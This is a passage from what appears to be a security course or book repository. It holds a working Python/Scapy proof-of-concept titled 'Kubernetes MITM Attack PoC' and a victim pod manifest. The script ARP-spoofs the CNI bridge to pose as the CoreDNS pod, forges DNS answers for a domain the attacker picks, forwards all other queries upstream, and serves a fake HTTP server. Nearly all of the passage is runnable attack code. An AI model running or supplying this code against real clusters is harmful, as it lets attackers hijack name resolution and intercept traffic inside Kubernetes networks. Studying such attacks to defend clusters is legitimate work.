src=self.local_server_ip) / UDP(
sport=53,
dport=req_pkt[UDP].sport) / DNS()
# if timeout, returning NXDOMAIN
if answer:
resp_pkt[DNS] = answer[DNS]
else:
resp_pkt[DNS] = self.generate_response(req_pkt, nx=True)
sendp(resp_pkt, verbose=verbose)
print("[+] {} <- KUBE-DNS response {} - {}".format(resp_pkt[IP].dst, str(req_domain),
parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0
else resp_pkt[DNS].rcode))
# else, get with upstream
else:
answer = sr1(IP(dst=self.upstream_server) / UDP() /
DNS(rd=1, qd=DNSQR(qname=req_domain)), verbose=verbose)
resp_pkt = Ether(
src=self.local_server_mac) / IP(
dst=req_pkt[IP].src,
src=self.local_server_ip) / UDP(
sport=53,
dport=req_pkt[UDP].sport) / DNS()
resp_pkt[DNS] = answer[DNS]
resp_pkt[DNS].id = req_pkt[DNS].id
sendp(resp_pkt, verbose=verbose)
print("[+] {} <- UPSTREAM response {} - {}".format(resp_pkt[IP].dst, str(req_domain),
parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0
else resp_pkt[DNS].rcode))
def spoof(self, req_pkt):
spf_resp = IP(dst=req_pkt[IP].src,
src=self.local_server_ip) / UDP(dport=req_pkt[UDP].sport,
sport=53) / self.generate_response(req_pkt,
ip=self.ip)
send(spf_resp, verbose=0, iface=self.interface)
print("[+] Spoofed response to: {} | {} is at {}".format(spf_resp[IP].dst,
str(req_pkt["DNS Question Record"].qname), self.ip))
def handle_queries(self, req_pkt):
""" decides whether to spoof or forward the packet """
if req_pkt["DNS Question Record"].qname.startswith(self.fake_domain.encode(
'utf-8')):
self.spoof(req_pkt)
else:
self.forward(req_pkt, verbose=False)
def dns_req_filter(self, pkt):
return (UDP in pkt and
DNS in pkt and
pkt[DNS].opcode == 0 and
pkt[DNS].ancount == 0 and
pkt[UDP].dport == 53 and
pkt[Ether].dst == self.mac and
pkt[IP].dst == self.local_server_ip)
def start(self):
# sniffing and filtering dns queries sent to self
sniff(
lfilter=self.dns_req_filter,
prn=self.handle_queries,
iface=self.interface,
store=False)
def get_self_mac_ip():
return Ether().src, ARP().psrc
def get_kube_dns_svc_ip():
with open('/etc/resolv.conf', 'r') as f:
return f.readline().strip().split(' ')[1]
def get_coredns_pod_mac_ip(kube_dns_svc_ip, self_ip, verbose):
mac = srp1(Ether() / IP(dst=kube_dns_svc_ip) /
UDP(dport=53) / DNS(rd=1, qd=DNSQR()), verbose=verbose).src
answers, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst="{}/24".format(self_ip)), timeout=4, verbose=verbose)
for answer in answers:
if answer[1].src == mac:
return mac, answer[1][ARP].psrc
return None, None
def get_bridge_mac_ip(verbose):
res = srp1(Ether() / IP(dst="8.8.8.8", ttl=1) / ICMP(), verbose=verbose)
return res[Ether].src, res[IP].src
def arp_spoofing(bridge_ip, coredns_pod_ip,
bridge_mac, verbose):
while True:
send(ARP(op=2,
pdst=bridge_ip,
psrc=coredns_pod_ip,
hwdst=bridge_mac),
verbose=verbose)
def fake_http_server():
server_address = ('', 80)
server = HTTPServer(server_address, S)
server.serve_forever()
def main(verbose):
print("Kubernetes MITM Attack PoC")
print("[*] Starting HTTP Server at 80...")
p1 = Process(target=fake_http_server)
p1.start()
self_mac, self_ip = get_self_mac_ip()
print("[+] Current pod IP: %s, MAC: %s" % (self_ip, self_mac))
kube_dns_svc_ip = get_kube_dns_svc_ip()
print("[+] Kubernetes DNS service IP: %s" % kube_dns_svc_ip)
coredns_pod_mac, coredns_pod_ip = get_coredns_pod_mac_ip(
kube_dns_svc_ip, self_ip, verbose=verbose)
print("[+] CoreDNS pod IP: %s, MAC: %s" %
(coredns_pod_ip, coredns_pod_mac))
bridge_mac, bridge_ip = get_bridge_mac_ip(verbose=verbose)
print("[+] CNI bridge IP: %s, MAC: %s" % (bridge_ip, bridge_mac))
print("[*] Starting ARP spoofing...")
p2 = Process(
target=arp_spoofing,
args=(
bridge_ip,
coredns_pod_ip,
bridge_mac,
verbose))
p2.start()
print("[*] Starting DNS proxy...")
# proxy dns query and response
dns_proxy = DnsProxy(
upstream_server="8.8.8.8",
local_server_mac=coredns_pod_mac,
local_server_ip=coredns_pod_ip,
self_mac=self_mac,
self_ip=self_ip,
fake_domain=sys.argv[1],
interface='eth0')
p3 = Process(target=dns_proxy.start)
p3.start()
while True:
time.sleep(1)
def usage():
print(
"Usage:\n\tpython3 {} target_domain".format(
sys.argv[0]))
if __name__ == "__main__":
if len(sys.argv) != 2:
usage()
else:
main(verbose=False)
================================================
FILE: code/0405-云原生网络攻击/victim.yaml
================================================
# victim pod
apiVersion: v1
kind: Pod
metadata:
name: victim
spec:
containers:
- name: main
image: curlimages/curl:latest
imagePullPolicy: IfNotPresent
# Just spin & wait forever
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]